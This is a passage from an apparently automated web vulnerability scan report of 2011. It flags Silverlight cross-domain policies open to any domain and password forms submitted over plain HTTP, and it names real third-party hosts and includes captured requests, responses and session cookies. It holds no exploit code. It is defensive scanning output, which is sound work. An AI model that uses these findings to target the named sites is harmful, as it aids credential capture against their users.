Date: Fri, 06 May 2011 19:31:59 GMT
Last-Modified: Thu, 01 Apr 2010 03:56:43 GMT
Expires: Fri, 06 May 2011 20:31:57 GMT
Content-Length: 268
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="http://*"/></allow-from><grant-to><resource path="/" include-subpath
...[SNIP]...
7.6. http://clk.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: image/gif
Date: Sat, 07 May 2011 01:22:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
7.7. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://haymarketbusinesspublications.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:03 GMT
Server: Omniture DC/2.0.0
xserver: www301
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
7.8. http://img.widgets.video.s-msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.widgets.video.s-msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: img.widgets.video.s-msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Type: text/xml
Last-Modified: Thu, 22 Jul 2010 20:17:26 GMT
Accept-Ranges: bytes
ETag: "5764ece6da29cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 19:30:35 GMT
Content-Length: 348
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...
7.9. http://om.expedia.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.expedia.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: om.expedia.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:33:41 GMT
Server: Omniture DC/2.0.0
xserver: www54
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
7.10. http://rad.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT
Accept-Ranges: bytes
ETag: "0d09952f3facb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 19:30:46 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...
7.11. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:40 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sat, 14 May 2011 01:50:40 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...
7.12. http://spe.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Sun, 08 May 2011 15:21:17 GMT
Date: Sat, 07 May 2011 11:30:17 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
7.13. http://www.gofileroom.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 390
Content-Type: text/xml
Last-Modified: Fri, 04 Jun 2010 19:58:26 GMT
Accept-Ranges: bytes
ETag: "05d5c4b204cb1:65d5"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:44:13 GMT
Connection: close
Set-Cookie: BIGipServerGFR_WWW_HTTP=3107511818.20480.0000; path=/

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
<domain uri="https://*" />
...[SNIP]...
7.14. https://www.gofileroom.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.gofileroom.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.gofileroom.com

Response

HTTP/1.1 200 OK
Content-Length: 390
Content-Type: text/xml
Last-Modified: Fri, 04 Jun 2010 19:58:26 GMT
Accept-Ranges: bytes
ETag: "05d5c4b204cb1:338c5"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:44:06 GMT
Connection: close
Set-Cookie: BIGipServerGFR_WWW_HTTP=2218319370.20480.0000; path=/

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
<domain uri="https://*" />
...[SNIP]...
8. Cleartext submission of password  previous  next
There are 15 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

8.1. http://hmficweb.hinghammutual.com/reglogin.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /reglogin.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /reglogin.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:35:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7626


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Hingham Mutual</title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
       <meta name=
...[SNIP]...
<body class="login" onload="Form1.txtUsername.focus();">
       <form name="Form1" method="post" action="reglogin.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="Form1">
<div>
...[SNIP]...
<div class="formField">
                                           <input name="txtPassword" type="password" id="txtPassword" class="textbox" />
                                       </div>
...[SNIP]...
8.2. http://login.vindicosuite.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2262
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSSCTDAT=ALNPJKACIDHPPEIGPANPDPFM; path=/
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:30:14 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
<div class = "loggedInAs">
       
           <form method="POST" action="vindico_dynamic.asp" name = "MainForm">
               <table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
...[SNIP]...
<td width="183" height="25"><input type="password" name="password" size="8"></td>
...[SNIP]...
8.3. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/index.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Password HTTP/1.1
Host: login.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSSCTDAT=ANMPJKACDGDFKLLGFIHDPGOP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3660
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:19:36 GMT


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
   <title>Password Reset</title>
   
   <script type="text
...[SNIP]...
</div>

<form name = "frm" id="frm" action = "" method = "Post" autocomplete="off">
<table cellpadding="5" cellspacing="0" border = "0" style="width: 100%;">
...[SNIP]...
<td width="100%">
<input type ="password" name="existingPassword" value= "">
</td>
...[SNIP]...
<td width="100%">
<input type ="password" name="newPassword" value="">
</td>
...[SNIP]...
8.4. http://login.vindicosuite.com/default.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /default.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /default.asp?message=Invalid%20Username%20and%20or%20Password HTTP/1.1
Host: login.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSSCTDAT=ANMPJKACDGDFKLLGFIHDPGOP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2294
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:21:14 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
<div class = "loggedInAs">
       
           <form method="POST" action="vindico_dynamic.asp" name = "MainForm">
               <table cellpadding="0" width="317" style="border-collapse: collapse" border="1" bordercolor="#C0C0C0" id="table3" height="152">
...[SNIP]...
<td width="183" height="25"><input type="password" name="password" size="8"></td>
...[SNIP]...
8.5. http://www.advisorsquare.com/useradmin/Authenticate.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /useradmin/Authenticate.asp?GroupId=85732&ComeBack=/useradmin/YourCPPortfolio.asp HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2145
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=OOBHGKOBOBCFHHIMIHNKOOLC; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:43 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
       <div align="center">
...[SNIP]...
<td BGCOLOR="#5b5b5a"><input type="Password" name="Password"></td>
...[SNIP]...
8.6. http://www.alumniconnections.com/alumni_members/mylisting/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.alumniconnections.com
Path:   /alumni_members/mylisting/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /alumni_members/mylisting/index.html HTTP/1.1
Host: www.alumniconnections.com
Proxy-Connection: keep-alive
Referer: http://www.harrisconnect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 06 May 2011 17:29:33 GMT
Content-type: text/html
Last-modified: Thu, 30 Apr 2009 03:01:15 GMT
Content-length: 8178
Etag: "1ff2-49f9147b"
Accept-ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</p>
                           <form action="olq_redirect.cgi" method="post" Name="OLQId" onSubmit="return checkField();">
                               <fieldset>
...[SNIP]...
</label> <input type="password" name="pass" size="14" maxlength="20"></li>
...[SNIP]...
8.7. http://www.eneighborhoods.com/login_form.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /login_form.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login_form.asp HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
Referer: http://www.eneighborhoods.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRACBCR=GBFHNDMBEDDPHNENMGKPCMIA; TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:39 GMT
Content-Length: 4661
Content-Type: text/html
Cache-control: private
Set-Cookie: TS825c04=63b4e3a605e4e95bc082d958cd9b28e09ac070c34f9e04364dc44124; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<!--Login Start-->
<script
...[SNIP]...
<td>
                       <form method="post" name="formlogin" action="checklogin.asp?page=1" onSubmit="return verifylogin()" ID="Form1">
                           <table width="200" border="0" cellpadding="0" cellspacing="0" bgcolor="#d8e1eb">
...[SNIP]...
<div align="left">
                                           <input type="password" name="password" size="22" /></div>
...[SNIP]...
8.8. http://www.gofileroom.com/lbmc/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gofileroom.com
Path:   /lbmc/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /lbmc/ HTTP/1.1
Host: www.gofileroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerGFR_WWW_HTTP=2251873802.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 10672
Content-Type: text/html
Expires: Sat, 07 May 2011 01:43:13 GMT
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCQQDACQB=MCGPLMNBAICKPDCMOMOHHOLJ; path=/
Date: Sat, 07 May 2011 01:44:13 GMT


<script language="javascript" type="text/javascript">
var protocol = "https://"
var server = "www.gofileroom.com"
var vRoot = ""
var gj= '/lbmc/Default.asp';
var httpAddress = window.location.h
...[SNIP]...
<table cellpadding="0" cellspacing="5" border="0" width="274" height="158">
                                       <form id="frmlogin" action="default.asp" method="post">
                                       <input type="hidden" name="txtXML" value="">
...[SNIP]...
<td align="left" bordercolor="#000000">
                                        <input id="password" type="password" class="form" name="password" style="border:1px solid #005A3C; width: 170;height:20" size="20">
                                        </td>
...[SNIP]...
8.9. http://www.lbmc.com/user  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lbmc.com
Path:   /user

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /user HTTP/1.1
Host: www.lbmc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=224675399.1304749048.1.1.utmgclid=CPPNuPTV1KgCFeM85QodgmKbjA|utmccn=(not%20set)|utmcmd=(not%20set); SESS083a1ac464c2b3bbfee975b7136aef65=u46gksfej3ltndtpup8vgslkp2; has_js=1; __utma=224675399.208570725.1304749048.1304749048.1304749048.1; __utmc=224675399; __utmb=224675399.7.10.1304749048

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:36:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Last-Modified: Sat, 07 May 2011 01:16:10 GMT
ETag: "76f8bd4cc9a9795d232607337f136cda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:og="http://opengr
...[SNIP]...
</div><form action="http://www.lbmc.com/user" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
<div class="description">
...[SNIP]...
8.10. http://www.resiteonline.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resiteonline.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.resiteonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:52:13 GMT
Server:
Content-Length: 8284
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <m
...[SNIP]...
</h3>
       <form action="http://app.resiteit.com/control/" method="post" enctype="application/x-www-form-urlencoded">
       <div id="loginbox">
...[SNIP]...
<label>Password    <input type="password" name="Password" id="Password" /></label>
...[SNIP]...
8.11. http://www.socialfollow.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:36 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=a66e1734b752a527fe65db3fafc4b523; expires=Fri, 06 May 2011 19:37:36 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7330
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h1>
       <form method="post" name="fRegister" action="/register.php">
       <table>
...[SNIP]...
<td><input name="tPassword" id="tPassword" type="password" value="" class="textBoxSize" maxlength="32" /></td>
...[SNIP]...
<td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td>
...[SNIP]...
8.12. http://www.socialfollow.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:36 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=a66e1734b752a527fe65db3fafc4b523; expires=Fri, 06 May 2011 19:37:36 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7330
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br />
               <form method="post" name="fTopLogin" action="/login.php">
                   <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" />
                   <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" />
                   <input type="submit" value="Login" class="button" />
...[SNIP]...
8.13. http://www.socialfollow.com/blog/  previous  next

Summary
